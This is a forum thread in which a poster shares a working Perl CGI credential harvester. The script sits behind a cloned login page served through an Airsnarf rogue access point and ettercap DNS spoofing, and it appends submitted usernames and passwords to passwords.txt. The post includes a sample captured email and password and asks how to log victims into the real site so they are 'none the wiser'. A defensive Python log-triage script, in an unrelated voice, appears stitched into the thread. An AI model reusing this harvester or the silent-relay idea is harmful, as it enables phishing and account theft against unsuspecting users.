
Thread: cgi script

  1. #1
    killadaninja (Join Date: Oct 2007; Location: London, United Kingdom; Posts: 526)

    cgi script

    Okay, so I've set up Airsnarf in the lab. I'm using ettercap to spoof the DNS, and I have modified a fake replica page where the login action invokes the CGI script below; the login is saved and all works fine. My question is, instead of serving up the said CGI page with the example message "sorry our server is down for maintenance", how would we go about using the information from stdin to refer and log the victim into their account whilst still recording the data to passwords.txt? So instead of stealing the victim's login and printing a suspicious "sorry our servers are down" message, the victim's login should be stolen but the victim should also be signed into his account, none the wiser of what just happened.

    So, a quick overview: the user presses login on the fake replica page, the CGI/HTML script is executed, his info is stored to passwords.txt, but he is also then logged in, without seeing any of this happen.


    CURRENT CGI SCRIPT

    #!perl
    # chmod +x this file and stick it in your cgi-bin directory

    # CHANGE THESE VARIABLES $page_title $page_message $page_image
    $page_title = "BUSY SERVERS";
    $page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
    $page_image = "SERVER.jpg";

    print "Content-type:text/html\n\n";

    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
    @pairs = split(/&/, $buffer);
    foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
    }
    $file = "/passwords.txt";
    open (MAIL, ">>$file") or dienice("Can't access $file!\n");
    print MAIL "\nurl = $ENV{'SERVER_NAME'}";
    foreach $key (keys(%FORM)) {
    print MAIL ", $key = $FORM{$key}";
    }
    close(MAIL);

    # return HTML message to user
    print "<html><head><title>$page_title</title></head><body>";
    print "<center>";
    print "<img src=\"/$page_image\"><br><br>";
    print "$page_message<br><br>\n";
    print "</body></html>";


    Here is an example of what passwords.txt looks like:

    url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0

    This is what the script needs to do, something like the following; excuse this pathetic attempt.

    #!perl
    # chmod +x this file and stick it in your cgi-bin directory


    print "Content-type:text/html\n\n";

    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
    @pairs = split(/&/, $buffer);
    foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
    }
    $file = "/passwords.txt";
    open (MAIL, ">>$file") or dienice("Can't access $file!\n");
    print MAIL "\nurl = $ENV{'SERVER_NAME'}";
    foreach $key (keys(%FORM)) {
    print MAIL ", $key = $FORM{$key}";
    }
    close(MAIL);

    # return HTML message to user
    <html>
    <body>

    <form method="post" action="not for forum">


    <input type="hidden" name="page" value="$page">

    username: <input type="text" name="login_email" value="$key" size=10><br>
    password: <input type="password" name="login_password" value="$FORM" size=10><p>


    <input type="submit" value="Log In">

    </form>

    </body>
    </html>

    Thanks in advance.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
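From the responder's side, the useful thing to do with a file in the format quoted above (one "url = ..., key = value, ..." record per line, as the posted CGI writes it) is to work out which accounts were captured so they can be forced through a password reset, without ever re-displaying the captured passwords. The script below is an added example, not the poster's code; the sample log lines are constructed in the same shape as the one quoted in the thread.

```python
"""Triage a harvester log of the 'url = X, key = value, ...' format.

Added example for incident response: extracts (url, login_email) pairs for a
reset/notification list and redacts any password-like field. It assumes the
record layout the posted CGI produces: a line starting with "url = ", then
", key = value" pairs. Because that format has no quoting, a value containing
", " would split wrongly; malformed fragments are skipped rather than trusted.
"""

SECRET_KEYS = {"login_password", "password", "passwd", "pass"}

# Constructed sample log, same shape as the line quoted in the thread.
SAMPLE_LOG = """
url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0
url = Backtrack Railway Services, login_email = second@example.com, login_password = hunter2, target_page = 0
"""


def parse_record(line):
    """Turn one record line into a dict; secret fields are redacted."""
    fields = {}
    # Split on ', ' first, then on the first ' = ' so empty values survive
    # (e.g. 'login_params = ' becomes '' rather than being dropped).
    for chunk in line.strip().split(", "):
        key, sep, value = chunk.partition(" = ")
        if not sep:
            continue  # fragment without ' = ': malformed, skip it
        fields[key] = "<redacted>" if key in SECRET_KEYS else value
    return fields


def affected_accounts(log_text):
    """Return sorted, de-duplicated (url, login_email) pairs from the log."""
    accounts = set()
    for line in log_text.splitlines():
        if not line.startswith("url = "):
            continue  # only lines the CGI wrote start this way
        rec = parse_record(line)
        email = rec.get("login_email", "").strip()
        if email:
            accounts.add((rec.get("url", ""), email.lower()))
    return sorted(accounts)


if __name__ == "__main__":
    for url, email in affected_accounts(SAMPLE_LOG):
        print(f"{url}: force reset for {email}")
```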

  2. #2
    (Join Date: Nov 2009; Posts: 1)

    Thanks a lot, man.
